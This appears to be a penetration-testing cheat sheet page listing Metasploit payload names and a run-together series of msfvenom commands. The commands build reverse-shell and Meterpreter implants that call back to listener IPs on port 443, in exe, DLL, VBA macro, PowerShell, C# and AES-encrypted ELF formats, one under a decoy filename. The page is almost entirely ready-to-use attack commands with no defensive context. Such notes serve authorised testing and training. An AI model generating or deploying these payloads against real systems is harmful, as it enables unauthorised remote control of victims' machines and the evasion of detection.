Metasploit Payloads
windows/shell_reverse_tcpwindows/shell/reverse_tcpType
Msfvenom command
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.220.128 LPORT=443 -f exe -o shell.exemsfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.220.128 LPORT=443 -f exe -o msfnonstaged.exemsfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f exe -o msfstaged.exemsfvenom -p windows/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 EXITFUNC=thread -f vbapplicationmsfvenom -p windows/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 EXITFUNC=thread -f ps1msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f csharpmsfvenom -p windows/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f csharpmsfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f dll -o met.dllmsfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.45.167 LPORT=443 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f elf -o tpsreports.elfLast updated